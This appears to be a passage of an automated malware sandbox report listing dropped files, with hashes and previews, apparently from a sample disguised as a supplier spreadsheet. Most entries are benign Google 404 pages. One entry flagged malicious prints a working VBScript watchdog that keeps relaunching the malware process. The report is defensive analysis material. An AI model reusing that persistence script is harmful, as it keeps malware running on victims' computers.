                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mwa7I3mqtqyMVwwdeKq19Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.259154212119844
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
                                                                                                                MD5:B8DE1941AF6AD63B6EB03D20BE27C7EC
                                                                                                                SHA1:810E007F76D76F4A467DCCE67D057C32492171C5
                                                                                                                SHA-256:6AB0813E9F7DF56D2741176D1615D19F5782EF54FBD6AB655A279F151B218562
                                                                                                                SHA-512:6FDF4F720C78953841F375EFA5CCE8F35AD0B27F2FAA8469C08DD3C601AD6B24C682051220A3616B800B00F0CBBE9350CA6C4467F1D9548A53FB5A1A84EF736C
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qdSfcjIpB_ko5oGRf4hyzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256352959060174
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0GbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3b+pAZewRDK4mW
                                                                                                                MD5:87D7EE407E60561D4DCCAA0E9B02EA8B
                                                                                                                SHA1:CF2C56654C89AB101AF09DB553F3DEF87087A26F
                                                                                                                SHA-256:7B9A60407BCD5528E16112D5F125CE418051DE32DBD14D6AD9982B14A9526E45
                                                                                                                SHA-512:E216D0B133C2565DD525C5F14EDD6E285E3C53D7572A5009A5305C29C1A089398FC90B69BB738F68B5D446DD39AD9ACF30BCAE8B188E3CD7CB6E0807DC152F57
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Mm4MfZy7x49p1LYFo-f5iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):881
                                                                                                                Entropy (8bit):5.371225585903793
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:dF/UF1SmSpU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF1SmSit+G+7xLxe0WABNVIqZaVzgA
                                                                                                                MD5:3B53868CE1EA81ABDD6DBA5CA8927B70
                                                                                                                SHA1:87FFDC07C23A79559CB2DD7FD44FB53B6B6958F2
                                                                                                                SHA-256:BAE50248F9F181D5C0413478E0E520F0C4E905A6D6F573D9E306825A36CE697B
                                                                                                                SHA-512:FAEDC809AF7C1D5534F4EB5CC5013D6564EE2D1EAED3D079D51A5569C0069B5CD9B7DE4E1D9023D8FCEA7AEECA80DE39FFE023455AFC61390698E735E5F052D3
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Supplier 0202AW-PER2 Sheet.exe"..fileset = """C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265318484210802
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0Q/zLDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Lv+pAZewRDK4mW
                                                                                                                MD5:179BF66299A661E53D7A2A2F13E673F8
                                                                                                                SHA1:78FF1A48BFAC69F0DC709A98E4F650E553EB1B8B
                                                                                                                SHA-256:4844AF524C57CE79A63DF59A509634147D70D49CE1D445B351DC894AA974D9F2
                                                                                                                SHA-512:2449396DE6F683896B0852234F5DDA0232BC4837C72F9C5EDF48D18BD0073F28331A091E2A293817A7D3051989B7495E218893754DAE43CE8B57925EE5F2F173
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PiAP-5OZ2PLYR7AXi-Ncsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266297674491208
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                MD5:FE45FFAFFDB9CAC5263C6B0EB5D06D76
                                                                                                                SHA1:3F542DCCADA538DE3AE37EC5E36F22390246D384
                                                                                                                SHA-256:54277E8CD3426B4FB5480FEBC4ACF02111C2811D988B6201E0BC2AA995A56F10
                                                                                                                SHA-512:5536E6DBD43D5BCA8FF847B12C0577046A76AA61D9D647C3198BEBE7633A110E17598DFA93D81AC21373C4887B218CB7FDB51ADCBD355CEC9D9581A9F66A77D1
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wNXhUxC3gsQWnuIDChwF4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.251733111854665
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0g8GkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0Gk+pAZewRDK4mW
                                                                                                                MD5:BF8BE002734A6711B19CE6CC5DF5DC97
                                                                                                                SHA1:4B6524DE3454EA81C4D0331E8B288EF00FFE62B5
                                                                                                                SHA-256:AEEC3AC4498EEB928FB9D4EC55372DD574F3A372451FF2F0008E5183B9C4AC22
                                                                                                                SHA-512:F940A96E64DD594B5CFCA2C2381DB43794E5280C2C57C349E4A66979E0EBBE03D0D4F9AF4D1A3BA922C5BE6924CC44391FF8BD8AB40586E63EDAEEADFA69D936
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tZcwGytT7BYZk5SlNecpdw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.266000843826172
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                MD5:89527441C9A92CD2E25B10629172FD34
                                                                                                                SHA1:09ADBD0042A4F220498696FBE4D161A9D5B37BC9
                                                                                                                SHA-256:699DBDEFEA582E5E946EB33A2EF8B92B4BEE22ABB92313D02CFB1CB18C2DAA01
                                                                                                                SHA-512:3A5F5F30E5F1357318AD367D30470AD9A8675B7480F693C0A70078D267220D56F75315057AC65F364A102E3B4026B8DD406AB79B62D1326887EE0C9E9EA652D2
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YcGUaJ1ERAiE9P9xeLjc6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.257909150101427
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                                MD5:1B283EABCADD1DB9F8B11F6B0E0FB535
                                                                                                                SHA1:D0D8EA201BED25D241FF2FD4C3E559E1A30CA32C
                                                                                                                SHA-256:D426611C9B13752957E5390917307F628834A4F73B1CE7EDB736471855D383EC
                                                                                                                SHA-512:F91F2A569ED9B00DF2E755E062E734E505A161BF994D927A79B9D8E21F2A615BF6DEB475FBC8706EB96F4F50CF9434E235F69F88DEDCF4296658C8AF189DB7E0
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OlP9QmgJrcne_YYAt62m5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256900545120508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0xQZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                MD5:77D70C3F5CBCE59D5737C0DC7F2B7968
                                                                                                                SHA1:837EF8208CC2C77D075DAB20C1B1480FC2697138
                                                                                                                SHA-256:348D3F3525B18B79004E7BE2A03A33C53130975D59D59308BCEA6D6A06AFE751
                                                                                                                SHA-512:FE29DBE7994BC05B3E5E29C5F7699D5522CE7B47C76FB84AE7274A18520D01F12C0C53B77EECD52F1E1EF1871612475F0789DE1668A115ACC36D81723122E504
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yZeTazalSRioqlyMCsnWWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.27342032091974
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QADSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Xg+pAZewRDK4mW
                                                                                                                MD5:6A48446D012EA51F3451D91CA6EF8178
                                                                                                                SHA1:700A13884298004CA2165F671B3EDA861794D03A
                                                                                                                SHA-256:008D07F616FF989C3F4F4DD902F9A81DBF9D38C2B9F6F761C86AA3878416B5E0
                                                                                                                SHA-512:F5FBF97238643F7E17CEDBBD895E56B3D1C133DBC1B368DE02D0642FEEB4927830080D10DBD640A3153C6ACF794C199951B5FE0B33C64845E3DB425C4B258F2D
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jOFEAt-PyJDvSNQ02eE5Cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.248738044135582
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0QDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vD+pAZewRDK4mW
                                                                                                                MD5:4811BE6E3CFB84240492E6E433C5D902
                                                                                                                SHA1:B9CDF1A69D28F5C3E67056EE6F0D6E4EEAA94A6A
                                                                                                                SHA-256:B5A430F29C9496415B201A8D428EB9F3E20854C24FEF20704C09F2F506D86FF6
                                                                                                                SHA-512:5370FF6E7DDD4C1308C87FE7C0BD903149FD1B81288B703402F8050BCC28B17D8BFBC2BB4931F60FDD498F1912C99B6DE34FAE516ADE5A2A939E7394E0A7F3CC
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="urUe7b6uajIg4i8xeSVp_g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.262797527534029
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                                MD5:0491823B2411D285AEBA6BD4B8A3A03B
                                                                                                                SHA1:D14E3DA406F50178DC251F808E3064CDC40071B9
                                                                                                                SHA-256:AB065287D6023EFBCDED94AC1E35F73525A320610A6C1A5313D2BB73DF296D3F
                                                                                                                SHA-512:FA1B4915216AB904BCCF48FEFABEA6F6BF25DEC5F76D70157F421F1C000446989E24A015AEAA66DBCBF4A6495619A1501EF74C2220CCB138C2C49EA400304715
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aQ5CkBA8fB8xxkHtgvfVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.259878354648374
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+09LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+gL+pAZewRDK4mW
                                                                                                                MD5:8B7AF61E6004DD6896DA9F8408297FFF
                                                                                                                SHA1:2062A9FA0D8A1009FF2836049E1A5957F42C9818
                                                                                                                SHA-256:42E0C9AF01C519CFBAD716EE1D0C3E2149378FBCECF76376AE569752B95C1EE5
                                                                                                                SHA-512:D3A8581F4FD0982BDEE5784F05B1B8DDA8398686CFF4B57C66136117B88B03FB20806F6B46F4BA6DDFD86630797589A0B0572D38F0AC1AAB95DF5FFEC8DE757A
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="z_HgEXnsNGGzSw_KviumXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.257456620298836
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0kmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B8290924743E2E841239C03FA0391500
                                                                                                                SHA1:D792D12BDFCEB165C809C96AA67B421340869099
                                                                                                                SHA-256:31CA9AF545F70150E81DCBE2986E111F8633AF762FD07C2C77C95CC6EE902BA4
                                                                                                                SHA-512:C4F2E5C51CE2F573678147D4913DAF3EC38944A7CD437C5498AC4DA858C898CCFC3D8AC5BA19AD90989CDAEC62861EEB3AF757D5D1FB12C533CF8375351DBF4E
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="txp-B56HmbBOvlGtuqCOfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265916698432673
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0tozIeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D8e+pAZewRDK4mW
                                                                                                                MD5:2E6F50B3D8A878366813EE40C7442998
                                                                                                                SHA1:41A5963B41ABAA22A5503870FF9B08A2250E4E79
                                                                                                                SHA-256:18086E770583B59273BFEBE2364E75232F29F0E69492C0C7ABDFA10C927DC1C9
                                                                                                                SHA-512:B576F9539C34096B92A1FB367F98965236F3F5E41D929930439F915E00AB304E43AECD314291C66AFF2377E3270A2712482FCFF80BD19AF47BC1C3FD36E28790
                                                                                                                Malicious:false
